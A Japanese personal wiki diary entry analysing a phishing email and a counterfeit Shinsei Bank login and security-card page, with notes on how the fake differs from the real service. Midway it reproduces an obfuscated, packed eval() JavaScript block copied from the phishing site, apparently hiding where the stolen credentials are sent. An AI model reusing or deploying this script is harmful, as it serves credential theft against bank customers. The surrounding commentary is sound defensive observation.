[[diary/Kojima]]
・新生銀行のフィッシングサイト
しばらく前にも新生銀行のフィッシングサイトが現われた,って話題がニュースになってたけど,
今日,また新しいフィッシングサイトへ誘導するメールがバラまかれたみたい.
私自身も新生銀行にはアカウントを持っているので,NNIPFでも新生銀行のメー
ルは通すようになっているのだけど,今朝がた,SPAM に判別されたメールを眺
めてみたら From 行は"no_reply@shinseibank.com" なアドレスなのに,IPアド
レスは全然別のところからのメールが SPAM と判定されていた.念のために中
身を見てみると,見た目の URL は新生銀行のPowerDirectだけど,実際に指し
ているのは全然別(kfcweb.com とか)のアドレスになっている誘導メールだった.
夕方に,新生銀行から注意を促すメールが届いたのだけど,Gmailでもきちん
と迷惑メールに分別されていた.
面白いかな,と思って,実際にそのメールが参照しているサイトへ行ってみた
ら,新生銀行のログイン画面をきれいにマネして作っていた.
#ref(shinsei1.jpg)
しかも,最近のPowerDirectだと,各ユーザごとに送付されたセキュリティカー
ドに記されたランダムなセキュリティ番号を入力しないといけないので,その
画面もちゃんと作ってあった.
#ref(shinsei2.jpg)
厳密に言うと,正式なセキュリティカードの場合はカードに記されたランダム
な記号のうち,指定された 3 個所の記号を入力することになっているので,
この画面みたいに横一列全部とかセキュリティカード番号を入力するような項
目は存在しない.
LiveConnect.php なるソースコードをざっと見た感じ,入力した情報を送信す
る先のサイトは直接記載されていないので,どうやら以下の javascript の中
に埋め込まれているみたい.
# javascript は詳しくないので,デコードはできなかったけど(^^;
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
('m(l(\'%b%k%e%1%j%9%n%g%t%s%o%r%g%9%q%i%2%1%0%0%5%e%2%1%0%0%3%8%2%1%0%0%3%3%2
%1%0%0%4%6%2%1%0%0%3%c%2%1%0%0%3%b%2%1%0%0%3%a%2%1%0%0%6%0%2%1%0%0%4%5%2%1%0%0%4
%6%2%1%0%0%3%5%2%1%0%0%5%b%2%1%0%0%3%d%2%1%0%0%4%7%2%1%0%0%4%7%2%1%0%0%4%0%2%1%0
%0%5%h%2%1%0%0%6%f%2%1%0%0%6%f%2%1%0%0%5%0%2%1%0%0%4%d%2%1%0%0%3%5%2%1%0%0%3%6%2
%1%0%0%3%7%2%1%0%0%3%3%2%1%0%0%5%8%2%1%0%0%3%3%2%1%0%0%5%3%2%1%0%0%5%8%2%1%0%0%6
%f%2%1%0%0%3%c%2%1%0%0%3%7%2%1%0%0%4%5%2%1%0%0%3%a%2%1%0%0%3%9%2%1%0%0%4%5%2%1%0
%0%3%a%2%1%0%0%6%9%2%1%0%0%4%0%2%1%0%0%3%d%2%1%0%0%4%0%2%1%0%0%6%0%2%1%0%0%4%4%2
%1%0%0%3%8%2%1%0%0%3%7%2%1%0%0%4%7%2%1%0%0%3%d%2%1%0%0%5%b%2%1%0%0%5%c%2%1%0%0%6
%0%2%1%0%0%3%d%2%1%0%0%3%a%2%1%0%0%3%8%2%1%0%0%3%4%2%1%0%0%3%d%2%1%0%0%4%7%2%1%0
%0%5%b%2%1%0%0%5%c%2%1%0%0%6%0%2%1%0%0%4%5%2%1%0%0%4%7%2%1%0%0%4%8%2%1%0%0%3%e%2
%1%0%0%3%a%2%1%0%0%5%b%2%1%0%0%6%6%2%1%0%0%3%7%2%1%0%0%3%8%2%1%0%0%4%5%2%1%0%0%4
%0%2%1%0%0%3%e%2%1%0%0%3%c%2%1%0%0%4%8%2%1%0%0%5%h%2%1%0%0%3%9%2%1%0%0%3%f%2%1%0
%0%3%9%2%1%0%0%3%a%2%1%0%0%6%6%2%1%0%0%5%9%2%1%0%0%5%e%2%1%0%0%6%f%2%1%0%0%3%8%2
%1%0%0%3%3%2%1%0%0%4%6%2%1%0%0%3%c%2%1%0%0%3%b%2%1%0%0%3%a%2%1%0%0%5%9%i%p\'));
',30,30,'30|75|5C|36|37|33|32|34|39|65|35|64|31|38|63|66|74|61|27|6D|6F|unescape|
eval|6E|72|29|28|69|77|2E'.split('|'),0,{}))</script>
フォーマットの都合で適宜改行を入れているのでご注意
まぁ,このフィッシングサイトでもメニューバーの URL 欄には
kfcweb.com/shinseibank.com.jp/login.html とか表示されているので,
その時点で怪しいサイトだと気づく(手元では,それ以前に誘導メール自体が
SPAM と判断されてたり)けど,ログイン画面とかはかなり正確にコピーされて
いるので,その努力にはちょっと感心したり(苦笑
#comment